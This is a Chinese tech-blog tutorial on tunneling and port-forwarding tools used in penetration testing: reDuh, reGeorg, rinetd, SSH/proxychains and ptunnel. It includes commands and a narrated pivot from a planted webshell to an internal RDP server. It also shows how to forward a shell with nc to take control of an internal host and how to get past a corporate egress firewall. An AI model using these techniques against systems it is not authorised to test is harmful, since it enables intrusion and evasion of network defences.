溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

發(fā)布時間:2021-12-27 14:51:11 來源:億速云 閱讀:314 作者:小新 欄目:網(wǎng)絡(luò)管理

這篇文章主要為大家展示了“web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些”,內(nèi)容簡而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領(lǐng)大家一起研究并學(xué)習(xí)一下“web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些”這篇文章吧。

運用情景:

在 Web 安全滲透測試經(jīng)常會面臨的一個問題,同時也是 Web 服務(wù)器加固方面一個很重要的部分,那就是 Web 服務(wù)器對外只開放一個 80 端口。Web 服務(wù)器的安全防護(hù)可以是操作系統(tǒng)的端口定制或者是網(wǎng)管防火前的端口定制。這時滲透測試人員如果想進(jìn)一步測試內(nèi)網(wǎng)的話必須先拿下目標(biāo)服務(wù)器并擁有一定的控制權(quán)限。 以前滲透測試人員常用的一些方法是通過上傳一些針對操作系統(tǒng)的可執(zhí)行文件到目標(biāo)服務(wù)器,并且必須要通過進(jìn)程的方式執(zhí)行該程序。但由于種種限制,所以陸續(xù)出現(xiàn)了不同類型的端口轉(zhuǎn)發(fā)與流量操控工具。

工具初探:

2.1 reDuh

工作原理:

我想大部分的測試人員都比我懂什么叫端口轉(zhuǎn)發(fā),說白了,reDuh 就是一款由腳本(asp; php; jsp)實現(xiàn)的端口轉(zhuǎn)發(fā)器。其實這個轉(zhuǎn)發(fā)器通過了兩次中轉(zhuǎn),我們下面以遠(yuǎn)程桌面服務(wù)連接做個圖例說明:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

由圖示上我們也可以看出,從 MSTSC 客戶端到目標(biāo)的 Terminal 服務(wù)器中間其實是走了一個這樣的流程:

 Mstsc 客戶端-->reDuh 代理-->HTTP tunne-->Web 服務(wù)器-->Terminal 服務(wù)器

當(dāng)然,對于 MSTSC 客戶端而言,這些過程都是透明的,我們只需要在 MSTSC 中指定連接的端口為本地 reDuh 監(jiān)聽的端口即可。

軟件使用:

1)運行 reDuhGUI 程序,出現(xiàn)如下界面。在 URL 輸入框中輸入 reDuh 的地址,點擊 Start 按鈕:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

2) 如果目標(biāo) URL 存在且工作正常,那么界面上會變成如下的樣式,我們可以看到,Create 按鈕的狀態(tài)變?yōu)榭捎?,這是,我們在 Create Tunnel 中輸入目標(biāo)服務(wù)器需要連接的地址和端口,以及本地監(jiān)聽的端口號,點擊 Create 按鈕。這里需要注意的是 Remote Host 的地址不是目標(biāo)服務(wù)器的 IP 地址,而是目標(biāo)服務(wù)器可以訪問的任意地址,假設(shè)目標(biāo)服務(wù)器的地址為 10.10.10.10,那么如果 Remote Host 為 127.0.0.1,其實就相當(dāng)于連接服務(wù)器上的地址;如果 Remote Host 為 10.10.10.11,那么相當(dāng)于讓服務(wù)器去連接內(nèi)網(wǎng)的另一臺服務(wù)器:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

3) 這時界面上會加入一條數(shù)據(jù)到列表框,說明本地監(jiān)聽到端口 1234,對應(yīng)于目標(biāo)服務(wù)器連接的 127.0.0.1:3389 端點:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

創(chuàng)建 HTTP 隧道成功后,我們可以使用 MSTSC 來進(jìn)行連接測試,在 Computer 中輸入對應(yīng)的本地監(jiān)聽地址,選擇連接:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

4)這時我們可以從程序的日志框中查看到大量的數(shù)據(jù)傳輸:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

5) 在 MSTSC 中能夠正常的連接遠(yuǎn)程桌面:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

6) 如果我們完成了操作需要斷開時,可以在右邊的列表框中選擇一項,然后點擊 Close 按鈕完成某條鏈路的銷毀; 如果想完全斷開當(dāng)前的連接,可以點擊 Kill 按鈕:

2.2 reGeorg+Proxifier

運行環(huán)境:pythony 以及 urllib3

下載地址:https://github.com/sensepost/reGeorg.git

原理大同小異,我就不解釋了,直接上測試使用過程。

運用情景:

在內(nèi)網(wǎng)測試的時候,mysql 為 root 權(quán)限,讀到配置文件,得到網(wǎng)站的根目錄,寫下馬,菜刀連之,發(fā)現(xiàn)是 system 權(quán)限,而且 3389 端口開放這時候出現(xiàn)了問題,外網(wǎng)訪問 3389 端口的時候,發(fā)現(xiàn)連接不上,只對內(nèi)網(wǎng)開放。這就很尷尬了,我在內(nèi)網(wǎng)中,服務(wù)器也在內(nèi)網(wǎng)中,而且我沒有公網(wǎng)機器。這個時候就需要使用 reGeorg+Proxifier

reGeorg 使用方法:

先將 reGeorg 的對應(yīng)腳本上傳到服務(wù)器端,reGeorg 提供了 PHP、ASPX、JSP 腳本,直接訪問顯示「Georg says, 'All seems fine'」,表示腳本運行正常。

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

運行命令提示符下切換到 C:\Python27\,運行 python reGeorgSocksProxy.py -u (上傳 reGeorg 腳本的地址) -p (轉(zhuǎn)發(fā)端口),參數(shù)順序無強制要求。

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

由于是基于 socks5, 本地還需安裝一個 socks5 代理工具此類工具網(wǎng)上很多,就以 Proxifier 為例子

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

然后將代理規(guī)則改成 proxy socket5 127.0.0.1

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

這時候訪問,成功進(jìn)入連上 3389

2.3 rinetd 實現(xiàn)流量轉(zhuǎn)發(fā)

實例:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

公司的的防火墻只允許 53 端口的出站流量(但是入站流量還是允許的),想通過 80 端口上網(wǎng),被拒絕。

解決思路:通過在家里放置一臺機器,使用公司的電腦去訪問家里的 53 端口,家里的電腦 20.1.1.1 通過流量轉(zhuǎn)發(fā)吧網(wǎng)站的流量返回給公司的網(wǎng)絡(luò)。

安裝:

apt-get install rinetd

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

配置:

Vim  /etc/rinetd.conf

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

啟動:rinetd

確定進(jìn)程是否啟動:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

從 XP 系統(tǒng)訪問 kali(IP:1.1.1.16)的 53 端口,發(fā)現(xiàn)可以訪問 110 的網(wǎng)站

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

轉(zhuǎn)發(fā) shell

在 192.168.1.110 機器上偵聽 333 端口

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

在 kali 上轉(zhuǎn)發(fā) 333 端口:

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

重啟服務(wù):

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

在內(nèi)網(wǎng)機器 1.1.1.12 輸入,命令:nc 192.168.1.16 53(連接 kali)

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

發(fā)現(xiàn)成功得到內(nèi)網(wǎng)機器的控制權(quán):

web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些

2.4 其他:

SSH 穿透

 ssh -D 127.0.0.1:1080 -p 22 user@IP

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains commands target

SSH 穿透從一個網(wǎng)絡(luò)到另一個網(wǎng)絡(luò)

 ssh -D 127.0.0.1:1080 -p 22 user1@IP1

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

Add socks4 127.0.0.1 1081 in /etc/proxychains.conf

proxychains commands target

ptunnle-Ping tunnel ICMP

通過 ICMP echo(ping requests)和 reply(ping reply) 實現(xiàn)隧道

服務(wù)器:

ptunnel -x 1234(-x 設(shè)置密碼)

客戶端:

sudo ptunnel -p proxy -lp 2222 -da destination -dp 22 -x 1234(da 就是目標(biāo)地址 dp 目標(biāo)端口 -x 密碼)

嵌套 SSH 隧道:

ssh -CNfg -D 7000 root@127.0.0.1 -p 2222

以上是“web安全中端口轉(zhuǎn)發(fā)流量操控工具有哪些”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對大家有所幫助,如果還想學(xué)習(xí)更多知識,歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

web
AI